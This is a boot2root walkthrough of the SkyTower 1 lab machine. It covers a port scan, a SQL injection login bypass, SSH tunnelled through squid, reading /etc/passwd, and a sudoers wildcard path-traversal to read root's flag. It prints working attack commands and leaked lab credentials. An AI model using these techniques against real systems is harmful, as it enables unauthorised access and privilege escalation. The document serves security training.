Skytower 1 boot2root


Starting Nmap 6.46 ( ) at 2014-06-28 23:18 EEST  
Nmap scan report for  
Host is up (0.00075s latency).  
Not shown: 997 closed ports  
22/tcp   filtered ssh  
80/tcp   open     http  
3128/tcp open     squid-http  

Let's examine the port 80:

Sql injection ??

Let's try to find out:

Post request:



There was an error running the query [You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''''' at line 1]  

Post data of the malicious request.



For security reasons, you must login to the SkyTech server via SSH to access the account details.

Username: john  
Email:[email protected]  
Password: hereisjohn  

SSH port is filtered and squid is installed in the server. I added in the ~/.ssh/config file the following 2 lines:

  ProxyCommand corkscrew 3128 %h %p

So i am using corkscrew to have ssh connection over squid.

Logging in:

ssh [email protected]


Linux SkyTower 3.2.0-4-amd64 #1 SMP Debian 3.2.54-2 x86_64

The programs included with the Debian GNU/Linux system are free software;  
the exact distribution terms for each program are described in the  
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent  
permitted by applicable law.  
Last login: Sat Jun 28 17:18:32 2014 from

Funds have been withdrawn  
Connection to closed.  

It logins normally but i don't have the time to execute a command. Then, i tried:

ssh [email protected] "cat /etc/passwd"

I found 2 more users in the passwd file:


Now, i know the email format of the company([email protected]), i can try the other usernames to the first form.

Post request

[email protected]&password='*'  

Username: sara
Password: ihatethisjob

Post request

[email protected]&password='*'  

Username: william
Password: senseable

In order to have shell, i should change the .bashrc file that closes the connection.

ssh [email protected] "mv /home/sara/.bashrc /home/sara/.bashrc_backup"  

After logging in, i typed sudo -l

sudo -l  
Matching Defaults entries for sara on this host:  
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User sara may run the following commands on this host:  
    (root) NOPASSWD: /bin/cat /accounts/*, (root) /bin/ls /accounts/*

The use of asterisks in sudoers file is dangerous as here.

sudo ls /accounts/../root/  
sudo cat /accounts/../root/flag.txt  
Congratz, have a cold one to celebrate!  
root password is theskytower  

AAnd we are root! It was an entry level boot2root but it has some unique 'features' like the use of squid.

Mysql credentials as a bonus:

cat /var/www/login.php | grep mysql  
$db = new mysqli('localhost', 'root', 'root', 'SkyTech');